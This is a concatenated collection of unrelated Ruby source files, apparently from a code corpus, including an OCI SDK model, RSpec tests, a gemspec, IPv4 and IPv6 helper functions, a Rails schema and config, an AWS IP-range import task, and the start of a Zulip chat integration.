# This software is dual-licensed to you under the Universal Permissive License (UPL) 1.0 as shown at https://oss.oracle.com/licenses/upl or Apache License 2.0 as shown at http://www.apache.org/licenses/LICENSE-2.0. You may choose either license.
require 'date'
# rubocop:disable Lint/UnneededCopDisableDirective, Metrics/LineLength
module OCI
# ChangeCustomProtectionRuleCompartmentDetails model.
class Waas::Models::ChangeCustomProtectionRuleCompartmentDetails
# **[Required]** The [OCID](https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm) of the compartment into which the resource should be moved. For information about moving resources between compartments, see [Moving Resources to a Different Compartment](https://docs.cloud.oracle.com/iaas/Content/Identity/Tasks/managingcompartments.htm#moveRes).
#
# @return [String]
attr_accessor :compartment_id
# Attribute mapping from ruby-style variable name to JSON key.
def self.attribute_map
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'compartmentId'
# rubocop:enable Style/SymbolLiteral
}
end
# Attribute type mapping.
def self.swagger_types
{
# rubocop:disable Style/SymbolLiteral
'compartment_id': :'String'
# rubocop:enable Style/SymbolLiteral
}
end
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:disable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# Initializes the object
# @param [Hash] attributes Model attributes in the form of hash
# @option attributes [String] :compartment_id The value to assign to the {#compartment_id} property
def initialize(attributes = {})
return unless attributes.is_a?(Hash)
# convert string to symbol for hash key
attributes = attributes.each_with_object({}) { |(k, v), h| h[k.to_sym] = v }
self.compartment_id = attributes[:'compartmentId'] if attributes[:'compartmentId']
raise 'You cannot provide both :compartmentId and :compartment_id' if attributes.key?(:'compartmentId') && attributes.key?(:'compartment_id')
self.compartment_id = attributes[:'compartment_id'] if attributes[:'compartment_id']
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity
# rubocop:enable Metrics/MethodLength, Layout/EmptyLines, Style/SymbolLiteral
# rubocop:disable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# Checks equality by comparing each attribute.
# @param [Object] other the other object to be compared
def ==(other)
return true if equal?(other)
self.class == other.class &&
compartment_id == other.compartment_id
end
# rubocop:enable Metrics/CyclomaticComplexity, Metrics/AbcSize, Metrics/PerceivedComplexity, Layout/EmptyLines
# @see the `==` method
# @param [Object] other the other object to be compared
def eql?(other)
self == other
end
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Calculates hash code according to all attributes.
# @return [Fixnum] Hash code
def hash
[compartment_id].hash
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# rubocop:disable Metrics/AbcSize, Layout/EmptyLines
# Builds the object from hash
# @param [Hash] attributes Model attributes in the form of hash
# @return [Object] Returns the model itself
def build_from_hash(attributes)
return nil unless attributes.is_a?(Hash)
self.class.swagger_types.each_pair do |key, type|
if type =~ /^Array<(.*)>/i
# check to ensure the input is an array given that the attribute
# is documented as an array but the input is not
if attributes[self.class.attribute_map[key]].is_a?(Array)
public_method("#{key}=").call(
attributes[self.class.attribute_map[key]]
.map { |v| OCI::Internal::Util.convert_to_type(Regexp.last_match(1), v) }
)
end
elsif !attributes[self.class.attribute_map[key]].nil?
public_method("#{key}=").call(
OCI::Internal::Util.convert_to_type(type, attributes[self.class.attribute_map[key]])
)
end
# or else data not found in attributes(hash), not an issue as the data can be optional
end
self
end
# rubocop:enable Metrics/AbcSize, Layout/EmptyLines
# Returns the string representation of the object
# @return [String] String presentation of the object
def to_s
to_hash.to_s
end
# Returns the object in the form of hash
# @return [Hash] Returns the object in the form of hash
def to_hash
hash = {}
self.class.attribute_map.each_pair do |attr, param|
value = public_method(attr).call
next if value.nil? && !instance_variable_defined?("@#{attr}")
hash[param] = _to_hash(value)
end
hash
end
private
# Outputs non-array value in the form of hash
# For object, use to_hash. Otherwise, just return the value
# @param [Object] value Any valid value
# @return [Hash] Returns the value in the form of hash
def _to_hash(value)
if value.is_a?(Array)
value.compact.map { |v| _to_hash(v) }
elsif value.is_a?(Hash)
{}.tap do |hash|
value.each { |k, v| hash[k] = _to_hash(v) }
end
elsif value.respond_to? :to_hash
value.to_hash
else
value
end
end
end
end
# rubocop:enable Lint/UnneededCopDisableDirective, Metrics/LineLength
| 37.205128 | 367 | 0.685734 |
399526a660f989217b9b31d872304daa5c2d1ebc | 225 | class Game < ActiveRecord::Base
belongs_to :category
self.primary_key = "sku"
validates :name, presence: true
validates :english_description, presence: true
validates :portuguese_description, presence: true
end
| 25 | 52 | 0.764444 |
ed62a600ab78ba9b3bd5963b12569ceccaf7b4b8 | 925 | Pod::Spec.new do |s|
s.name = 'CSS3ColorsSwift'
s.version = '1.1.5'
s.summary = 'A UIColor extension for Web Color.'
s.description = <<-DESC
CSS3ColorsSwift provides a UIColor extension with Web Color names.
DESC
s.homepage = 'https://github.com/WorldDownTown/CSS3ColorsSwift'
s.screenshots = 'https://github.com/WorldDownTown/CSS3ColorsSwift/raw/master/images/screenshot.png'
s.license = { type: 'MIT', file: 'LICENSE' }
s.author = { 'WorldDownTown' => '[email protected]' }
s.social_media_url = 'https://twitter.com/WorldDownTown'
s.platform = :ios
s.platform = :ios, '9.0'
s.source_files = 'CSS3ColorsSwift/*.swift'
s.framework = 'UIKit'
end
| 48.684211 | 107 | 0.593514 |
d506a765c90b6d0bc9601bc8bf43713935408bc4 | 1,836 | describe MiqDecorator do
context ".for" do
it "returns nil when a class doesn't have a decorator" do
class TestClassWithout1
end
expect(MiqDecorator.for(TestClassWithout1)).to eq(nil)
end
it "correctly decorates a class when a decorator exists" do
class TestClass2
end
class TestClass2Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestClass2)).to eq(TestClass2Decorator)
end
it "correctly decorates a namespaced class" do
module TestModule3
class TestClass3
end
class TestClass3Decorator < MiqDecorator
end
end
expect(MiqDecorator.for(TestModule3::TestClass3)).to eq(TestModule3::TestClass3Decorator)
end
it "correctly doesn't decorate a namespaced class" do
module TestModule4
class TestClass4
end
end
class TestClass4Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestModule4::TestClass4)).not_to eq(TestClass4Decorator)
expect(MiqDecorator.for(TestModule4::TestClass4)).to eq(nil)
end
it "correctly decorates a class when only a decorator for the superclass" do
class TestParent5
end
class TestClass5 < TestParent5
end
class TestParent5Decorator < MiqDecorator
end
expect(MiqDecorator.for(TestClass5)).to eq(TestParent5Decorator)
end
it "correctly decorates an instance" do
class TestClass6
extend MiqDecorator::Klass
include MiqDecorator::Instance
attr_reader :x
def initialize(x)
@x = x
end
end
class TestClass6Decorator < MiqDecorator
def foo
x + 1
end
end
instance = TestClass6.new(123)
expect(instance.decorate.foo).to eq(124)
end
end
end
| 22.390244 | 95 | 0.654684 |
392c41120f6c19c4680a8237847f482e018348fc | 826 | # frozen_string_literal: true
module EE
module Gitlab
module Ci
module Parsers
extend ActiveSupport::Concern
class_methods do
def parsers
super.merge({
license_management: ::Gitlab::Ci::Parsers::LicenseCompliance::LicenseScanning,
license_scanning: ::Gitlab::Ci::Parsers::LicenseCompliance::LicenseScanning,
dependency_scanning: ::Gitlab::Ci::Parsers::Security::DependencyScanning,
container_scanning: ::Gitlab::Ci::Parsers::Security::ContainerScanning,
dast: ::Gitlab::Ci::Parsers::Security::Dast,
sast: ::Gitlab::Ci::Parsers::Security::Sast,
metrics: ::Gitlab::Ci::Parsers::Metrics::Generic
})
end
end
end
end
end
end
| 31.769231 | 94 | 0.59201 |
18d2fa8437a08816b489a7335f25a99afdfac42c | 529 | # A user who is assigned to a task
class TaskOwner < ActiveRecord::Base
belongs_to :user
belongs_to :task#, :touch => true
named_scope :unread, :conditions => { :unread => true }
# touch currently calls validations, which fail when creating from email, so update manually
# see https://rails.lighthouseapp.com/projects/8994/tickets/2520-patch-activerecordtouch-without-validations
after_save :touch_task
private
def touch_task
self.task.update_attributes(:updated_at => Time.now) if self.task
end
end
| 27.842105 | 110 | 0.746692 |
1a62349cfc24376d283c765aaec932fa8c992229 | 405 | require 'talltorp_foodie'
describe TalltorpFoodie::Foodie do
it "broccoli is gross" do
expect(TalltorpFoodie::Foodie.portray("Broccoli")).to eql("Gross!")
end
it "anything else is delicious" do
expect(TalltorpFoodie::Foodie.portray("Not Broccoli")).to eql("Delicious!")
end
it "pluralizes a word" do
expect(TalltorpFoodie::Foodie.pluralize("Tomatoe")).to eql("Tomatoes")
end
end | 27 | 79 | 0.723457 |
e9e855ebb2b2bfea79c380a6ffae0f9b1f9f9cd8 | 433 | #!/home/software/ruby-1.8.7/bin/ruby -w
require 'rvg/rvg'
rvg = Magick::RVG.new(200, 100) do |canvas|
canvas.background_fill = 'white'
canvas.rect(150, 50, 25, 25).round(6).
styles(:fill=>'none', :stroke=>'purple', :stroke_width=>10, :stroke_dasharray=>[10,5])
canvas.rect(199, 99).styles(:fill=>'none', :stroke=>'blue')
end
rvg.draw.write('rvg_stroke_dasharray.gif')
| 33.307692 | 106 | 0.591224 |
61c2a09ced1ee8458599b48f640730843e1765c7 | 1,834 | require_relative "lib/shopify_cli/version"
Gem::Specification.new do |spec|
spec.name = "shopify-cli"
spec.version = ShopifyCLI::VERSION
spec.authors = ["Shopify"]
spec.email = ["[email protected]"]
spec.license = "MIT"
spec.summary = "Shopify CLI helps you build Shopify apps faster."
spec.description = <<~HERE
Shopify CLI helps you build Shopify apps faster. It quickly scaffolds Node.js
and Ruby on Rails embedded apps. It also automates many common tasks in the
development process and lets you quickly add popular features, such as billing
and webhooks.
HERE
spec.homepage = "https://shopify.github.io/shopify-cli/"
spec.required_ruby_version = Gem::Requirement.new(">= 2.6")
spec.metadata["allowed_push_host"] = "https://rubygems.org"
spec.metadata["homepage_uri"] = spec.homepage
spec.metadata["source_code_uri"] = "https://github.com/Shopify/shopify-cli"
spec.metadata["changelog_uri"] = "https://github.com/Shopify/shopify-cli/blob/main/CHANGELOG.md"
# Specify which files should be added to the gem when it is released.
# The `git ls-files -z` loads the files in the RubyGem that have been added into git.
spec.files = Dir.chdir(File.expand_path("..", __FILE__)) do
%x(git ls-files -z).split("\x0").reject do |f|
f.match(%r{^(test|spec|features|packaging)/}) ||
f.match(%r{^bin/(update-deps|shopify.bat)$})
end
end
spec.bindir = "bin"
spec.require_paths = ["lib", "vendor"]
spec.executables << "shopify"
spec.add_development_dependency("bundler", "~> 2.2.2")
spec.add_development_dependency("rake", "~> 12.3", ">= 12.3.3")
spec.add_development_dependency("minitest", "~> 5.0")
spec.add_dependency("bugsnag", "~> 6.22")
spec.add_dependency("listen", "~> 3.7.0")
spec.add_dependency("theme-check", "~> 1.7.2")
end
| 39.869565 | 98 | 0.696838 |
28b0bd1d2db35545c3c0ae44407337521f967278 | 5,692 | # $Id: misc.rb 14 2008-03-02 05:42:30Z warchild $
#
# Copyright (c) 2008, Jon Hart
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the <organization> nor the
# names of its contributors may be used to endorse or promote products
# derived from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY Jon Hart ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL Jon Hart BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
require 'ipaddr'
module Racket
module L3
# Miscellaneous L3 helper methods
module Misc
# given an IPv4 address packed as an integer
# return the friendly "dotted quad"
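# Example:
#   Misc.long2ipv4(3232235521)   # => "192.168.0.1"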
def Misc.long2ipv4(long)
quad = Array.new(4)
quad[0] = (long >> 24) & 255
quad[1] = (long >> 16) & 255
quad[2] = (long >> 8 ) & 255
quad[3] = long & 255
quad.join(".")
end
def Misc.randomipv4
Misc.long2ipv4(rand(2**32))
end
# Compute link local address for a given mac address
# From Daniele Bellucci
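# Example:
#   Misc.linklocaladdr("00:0c:29:aa:bb:cc")   # => "fe80::20c:29ff:feaa:bbcc"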
def Misc.linklocaladdr(mac)
mac = mac.split(":")
mac[0] = (mac[0].to_i(16) ^ (1 << 1)).to_s(16)
["fe80", "", mac[0,2].join, mac[2,2].join("ff:fe"), mac[4,2].join].join(":")
end
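      # A worked example (MAC value is illustrative):
      #   Misc.linklocaladdr("00:11:22:33:44:55") #=> "fe80::211:22ff:fe33:4455"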
# Given a long, convert it to an IPv6 address,
# optionally compressing the address returned
def Misc.long2ipv6(long, compress=true)
ipv6 = []
ipv6[0] = long >> 112
ipv6[1] = (long >> 96) & (0xFFFF)
ipv6[2] = (long >> 80) & (0xFFFF)
ipv6[3] = (long >> 64) & (0xFFFF)
ipv6[4] = (long >> 48) & (0xFFFF)
ipv6[5] = (long >> 32) & (0xFFFF)
ipv6[6] = (long >> 16) & (0xFFFF)
ipv6[7] = long & (0xFFFF)
ipv6 = ipv6.map { |o| o.to_s(16) }.join(":")
compress ? Misc.compressipv6(ipv6) : ipv6
end
# Compress an IPv6 address
# Inspired by Daniele Bellucci and jacked from ipaddr
def Misc.compressipv6(ipv6)
ipv6.gsub!(/\b0{1,3}([\da-f]+)\b/i, '\1')
loop do
break if ipv6.sub!(/\A0:0:0:0:0:0:0:0\Z/, '::')
break if ipv6.sub!(/\b0:0:0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0:0\b/, ':')
break if ipv6.sub!(/\b0:0\b/, ':')
break
end
ipv6.sub!(/:{3,}/, '::')
if /\A::(ffff:)?([\da-f]{1,4}):([\da-f]{1,4})\Z/i =~ ipv6
ipv6 = sprintf('::%s%d.%d.%d.%d', $1, $2.hex / 256, $2.hex % 256, $3.hex / 256, $3.hex % 256)
end
ipv6
end
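      # Worked examples (values are illustrative):
      #   Misc.long2ipv6(1)        #=> "::1"  (the zero run collapses)
      #   Misc.long2ipv6(1, false) #=> "0:0:0:0:0:0:0:1"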
def Misc.randomipv6
Misc.long2ipv6(rand(2**128))
end
# given a string representing an IPv6
# address, return the integer representation
def Misc.ipv62long(ip)
IPAddr.new(ip).to_i
end
# In addition to the regular multicast addresses, each unicast address
# has a special multicast address called its solicited-node address. This
# address is created through a special mapping from the device’s unicast
# address. Solicited-node addresses are used by the IPv6 Neighbor
# Discovery (ND) protocol to provide more efficient address resolution
# than the ARP technique used in IPv4.
# From Daniele Bellucci
def Misc.soll_mcast_addr6(addr)
h = addr.split(':')[-2, 2]
m = []
m << 'ff'
m << (h[0].to_i(16) & 0xff).to_s(16)
m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
m << (h[1].to_i(16) & 0xff).to_s(16)
'ff02::1:' + [m[0,2].join, m[2,2].join].join(':')
end
      # Compute the solicited-node multicast MAC address for an IPv6 address
def Misc.soll_mcast_mac(addr)
h = addr.split(':')[-2, 2]
m = []
m << 'ff'
m << (h[0].to_i(16) & 0xff).to_s(16)
m << ((h[1].to_i(16) & (0xff << 8)) >> 8).to_s(16)
m << (h[1].to_i(16) & 0xff).to_s(16)
'33:33:' + m.join(':')
end
# given a "dotted quad" representing an IPv4
# address, return the integer representation
def Misc.ipv42long(ip)
IPAddr.new(ip).to_i
end
# Calculate the checksum. 16 bit one's complement of the one's
# complement sum of all 16 bit words
def Misc.checksum(data)
num_shorts = data.length / 2
checksum = 0
count = data.length
data.unpack("S#{num_shorts}").each { |x|
checksum += x
count -= 2
}
if (count == 1)
checksum += data[data.length - 1, 1].unpack('C')[0]
end
checksum = (checksum >> 16) + (checksum & 0xffff)
checksum = ~((checksum >> 16) + checksum) & 0xffff
([checksum].pack("S*")).unpack("n*")[0]
end
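      # A tiny sanity check (input chosen so the math is easy to follow):
      #   Misc.checksum("\xff\xff") #=> 0  (sum 0xffff, folded and complemented to 0)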
end
end
end
# vim: set ts=2 et sw=2:
| 34.083832 | 101 | 0.601195 |
617b490fecd2253c74071cfb03225e5f26190ce6 | 70 | # -*- encoding : utf-8 -*-
module TntMercurio
VERSION = "1.0.0"
end
| 14 | 26 | 0.6 |
f7d92195112ab863459f18348aca476beb59ea13 | 3,909 | # This file is auto-generated from the current state of the database. Instead
# of editing this file, please use the migrations feature of Active Record to
# incrementally modify your database, and then regenerate this schema definition.
#
# This file is the source Rails uses to define your schema when running `rails
# db:schema:load`. When creating a new database, `rails db:schema:load` tends to
# be faster and is potentially less error prone than running all of your
# migrations from scratch. Old migrations may fail to apply correctly if those
# migrations use external dependencies or application code.
#
# It's strongly recommended that you check this file into your version control system.
ActiveRecord::Schema.define(version: 2020_04_01_004946) do
# These are extensions that must be enabled in order to support this database
enable_extension "plpgsql"
create_table "active_storage_attachments", force: :cascade do |t|
t.string "name", null: false
t.string "record_type", null: false
t.bigint "record_id", null: false
t.bigint "blob_id", null: false
t.datetime "created_at", null: false
t.index ["blob_id"], name: "index_active_storage_attachments_on_blob_id"
t.index ["record_type", "record_id", "name", "blob_id"], name: "index_active_storage_attachments_uniqueness", unique: true
end
create_table "active_storage_blobs", force: :cascade do |t|
t.string "key", null: false
t.string "filename", null: false
t.string "content_type"
t.text "metadata"
t.bigint "byte_size", null: false
t.string "checksum", null: false
t.datetime "created_at", null: false
t.index ["key"], name: "index_active_storage_blobs_on_key", unique: true
end
create_table "contests", force: :cascade do |t|
t.string "name"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "start_datetime"
t.integer "end_datetime"
end
create_table "languages", force: :cascade do |t|
t.string "name"
t.string "extension"
end
create_table "problems", force: :cascade do |t|
t.string "name"
t.text "description"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "contest_id"
t.string "uuid"
t.integer "time_limit", default: 2
t.index ["contest_id"], name: "index_problems_on_contest_id"
end
create_table "submissions", force: :cascade do |t|
t.text "code"
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.integer "language_id"
t.integer "problem_id"
t.integer "user_id"
t.string "message"
t.integer "score"
t.boolean "success"
t.index ["language_id"], name: "index_submissions_on_language_id"
t.index ["problem_id"], name: "index_submissions_on_problem_id"
t.index ["user_id"], name: "index_submissions_on_user_id"
end
create_table "users", force: :cascade do |t|
t.datetime "created_at", precision: 6, null: false
t.datetime "updated_at", precision: 6, null: false
t.string "email", null: false
t.string "encrypted_password", limit: 128, null: false
t.string "confirmation_token", limit: 128
t.string "remember_token", limit: 128, null: false
t.integer "role"
t.string "full_name"
t.boolean "is_suspended", default: false
t.integer "last_request"
t.integer "email_confirmed_at"
t.string "email_confirmation_token"
t.index ["email"], name: "index_users_on_email"
t.index ["remember_token"], name: "index_users_on_remember_token"
end
add_foreign_key "active_storage_attachments", "active_storage_blobs", column: "blob_id"
add_foreign_key "problems", "contests"
add_foreign_key "submissions", "languages"
add_foreign_key "submissions", "problems"
add_foreign_key "submissions", "users"
end
| 38.70297 | 126 | 0.718086 |
5d731191a884273b0b6bfbe3af81809d5598866c | 1,046 |
module NeverBounce; module API; module Request
describe JobsDelete do
include_dir_context __dir__
it_behaves_like "instantiatable"
describe ".response_klass" do
it { expect(described_class.response_klass).to eq Response::JobsDelete }
end
describe "#to_httparty" do
it "generally works" do
r = newo
expect { r.to_httparty }.to raise_error(AttributeError, "Attribute must be set: job_id")
r.job_id = "123"
expect { r.to_httparty }.to raise_error(AttributeError, "Attribute must be set: api_key")
r.api_key = "api_key"
res = r.to_httparty
expect(res).to be_a Array
method, url, data = res
expect(method).to eq :post
expect(url).to eq "https://api.neverbounce.com/v4.1/jobs/delete"
expect(data).to include(:body, :headers)
expect(data.fetch(:body)).to eq("{\"job_id\":\"123\",\"key\":\"api_key\"}")
expect(data.fetch(:headers)).to include("Content-Type", "User-Agent")
end
end
end
end; end; end
| 32.6875 | 97 | 0.638623 |
79711b9910f57053f6b76a1010a6fd0c60fc5275 | 200 | require 'rails_helper'
RSpec.describe "events", type: :routing do
it "routes /upcoming to events#index" do
expect(get: "/upcoming").to route_to(controller: "events", action: "index")
end
end
| 25 | 79 | 0.71 |
33f3e6bec1b4ce411581f5d434d71f37b3a3679f | 664 | module Mulukhiya
class LineService < Ginseng::LineService
include Package
def initialize(params = {})
super rescue nil
@id = params[:id] || LineService.id
@token = (params[:token].decrypt rescue params[:token]) || LineService.token
end
def self.id
return config['/alert/line/to'] rescue nil
end
def self.token
return config['/alert/line/token'].decrypt
rescue Ginseng::ConfigError
return nil
rescue
return config['/alert/line/token']
end
def self.config?
return false unless LineService.id
return false unless LineService.token
return true
end
end
end
| 22.133333 | 82 | 0.64759 |
5da295254d86de46499526b193984e3e113b24bb | 1,787 | require_relative 'boot'
require "rails"
# Pick the frameworks you want:
require "active_model/railtie"
require "active_job/railtie"
require "active_record/railtie"
require "active_storage/engine"
require "action_controller/railtie"
require "action_mailer/railtie"
require "action_mailbox/engine"
require "action_text/engine"
require "action_view/railtie"
require "action_cable/engine"
# require "sprockets/railtie"
require "rails/test_unit/railtie"
# Require the gems listed in Gemfile, including any gems
# you've limited to :test, :development, or :production.
Bundler.require(*Rails.groups)
module App
class Application < Rails::Application
# Initialize configuration defaults for originally generated Rails version.
config.load_defaults 6.0
# Settings in config/environments/* take precedence over those specified here.
# Application configuration can go into files in config/initializers
# -- all .rb files in that directory are automatically loaded after loading
# the framework and any gems in your application.
# Only loads a smaller set of middleware suitable for API only apps.
# Middleware like session, flash, cookies can be added back manually.
# Skip views, helpers and assets when generating a new resource.
config.api_only = true
# NOTE:
    # Writing config.hosts << ".hibriiiidge.com" in development.rb succeeds, but
    # it fails with production.rb.
    # To allow requests to app, add the following to your environment configuration:
    # Adding config.hosts << ".hibriiiidge.com" here also fails.
    # config.hosts << "app"
    # That said, it seems config.hosts may not need to be set here at all?
config.middleware.use ActionDispatch::Flash
config.autoload_paths += %W(#{Rails.root}/lib/sessions)
config.eager_load_paths += %W(#{Rails.root}/lib/sessions)
end
end
| 35.74 | 84 | 0.752658 |
21b07440eb711a233e99911451576f40abce0886 | 98 | class DropClassmarks < ActiveRecord::Migration
def change
drop_table :classmarks
end
end
| 14 | 46 | 0.765306 |
33318c62642068665fc8871f1b74ac797d5bfa59 | 150 | class AddHasTodoToProject < ActiveRecord::Migration
def change
add_column :projects, :has_todo, :boolean, null: false, default: false
end
end
| 25 | 74 | 0.76 |
38a19314c22b0812759cdce0bd9ab751d7694a7b | 1,560 | module Intrigue
module Task
class ImportAwsIpv4Ranges < BaseTask
include Intrigue::Task::Web
def self.metadata
{
:name => "import/aws_ipv4_ranges",
:pretty_name => "Import AWS IPv4 Ranges",
:authors => ["jcran"],
:description => "This gathers the ranges from AWS.",
:references => [],
:type => "import",
:passive => true,
:allowed_types => ["*"],
:example_entities => [
{"type" => "String", "details" => {"name" => "us-east-1"}}
],
:allowed_options => [
{:name => "service", :regex => "alpha_numeric", :default => "EC2" },
{:name => "limit", :regex => "alpha_numeric", :default => 10 },
],
:created_types => ["NetBlock"]
}
end
## Default method, subclasses must override this
def run
super
region = _get_entity_name
service = _get_option("service")
limit = _get_option("limit")
range_data = JSON.parse(http_get_body("https://ip-ranges.amazonaws.com/ip-ranges.json"))
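      # A sample element of the "prefixes" array, shaped as AWS publishes it
      # (IPv6 entries live under a separate "ipv6_prefixes" key, so
      # range["ipv6_prefix"] is typically nil for these):
      #   { "ip_prefix" => "3.5.140.0/22", "region" => "ap-northeast-2", "service" => "EC2" }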
range_data["prefixes"].each do |range|
_log "Parsing... #{range}"
limit-=1
if limit == 0
_log "Hit limit, exiting!"
return
end
next unless (region == "#{range["region"]}" || region == "*")
next unless (service == "#{range["service"]}" || service == "*")
prefix = "#{range["ipv6_prefix"]}#{range["ip_prefix"]}"
_log " -> Creating #{prefix}"
_create_entity("NetBlock", {"name" => "#{prefix}", "aws_region" => region, "aws_service" => service })
end
end
end
end
end
| 26.440678 | 108 | 0.562821 |
6a13aa81cc4d85b14991143c31c35edd4bec9140 | 260 | module MiniMagick
##
# @return [Gem::Version]
#
def self.version
Gem::Version.new VERSION::STRING
end
module VERSION
MAJOR = 4
MINOR = 0
TINY = 2
PRE = nil
STRING = [MAJOR, MINOR, TINY, PRE].compact.join('.')
end
end
| 14.444444 | 56 | 0.580769 |
915ba9735f5b5977afde0718a28dd4ff7e35c577 | 1,390 | # frozen_string_literal: true
class DeviseCreateUsers < ActiveRecord::Migration[6.0]
def change
create_table :users do |t|
## Database authenticatable
t.string :email, null: false, default: ''
t.string :encrypted_password, null: false, default: ''
## Recoverable
t.string :reset_password_token
t.datetime :reset_password_sent_at
## Rememberable
t.datetime :remember_created_at
## Trackable
t.integer :sign_in_count, default: 0, null: false
t.datetime :current_sign_in_at
t.datetime :last_sign_in_at
t.string :current_sign_in_ip
t.string :last_sign_in_ip
## Confirmable
# t.string :confirmation_token
# t.datetime :confirmed_at
# t.datetime :confirmation_sent_at
# t.string :unconfirmed_email # Only if using reconfirmable
## Lockable
# t.integer :failed_attempts, default: 0, null: false # Only if lock strategy is :failed_attempts
# t.string :unlock_token # Only if unlock strategy is :email or :both
# t.datetime :locked_at
t.timestamps null: false
end
add_index :users, :email, unique: true
add_index :users, :reset_password_token, unique: true
# add_index :users, :confirmation_token, unique: true
# add_index :users, :unlock_token, unique: true
end
end
| 31.590909 | 104 | 0.656115 |
b9fe12a53bc4d826dbffcccc0c38a765ce03e2ad | 3,112 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Ensures that a master key has been made available in either ENV["RAILS_MASTER_KEY"]
# or in config/master.key. This key is used to decrypt credentials (and other encrypted files).
# config.require_master_key = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
config.public_file_server.headers = {
'Cache-Control' => 'public, s-maxage=31536000, max-age=15552000',
'Expires' => 1.year.from_now.to_formatted_s(:rfc822)
}
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "docs_#{Rails.env}"
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
config.logger = ActiveSupport::Logger.new(STDOUT)
end
end
| 40.415584 | 102 | 0.754499 |
877584dc02724c537d9fa8bdd3750fdd5bf49a58 | 2,549 | # frozen_string_literal: true
module DiscourseChat
module Provider
module ZulipProvider
PROVIDER_NAME = "zulip".freeze
PROVIDER_ENABLED_SETTING = :chat_integration_zulip_enabled
CHANNEL_PARAMETERS = [
{ key: "stream", unique: true, regex: '^\S+' },
{ key: "subject", unique: true, regex: '^\S+' },
]
def self.send_message(message)
uri = URI("#{SiteSetting.chat_integration_zulip_server}/api/v1/messages")
http = Net::HTTP.new(uri.host, uri.port)
http.use_ssl = (uri.scheme == 'https')
req = Net::HTTP::Post.new(uri)
req.basic_auth(SiteSetting.chat_integration_zulip_bot_email_address, SiteSetting.chat_integration_zulip_bot_api_key)
req.set_form_data(message)
response = http.request(req)
response
end
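      # A minimal usage sketch (stream and subject values are illustrative;
      # the hash mirrors the form fields Zulip's POST /api/v1/messages expects):
      #   send_message(type: "stream", to: "errors", subject: "discourse", content: "hello")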
def self.generate_zulip_message(post, stream, subject)
display_name = "@#{post.user.username}"
full_name = post.user.name || ""
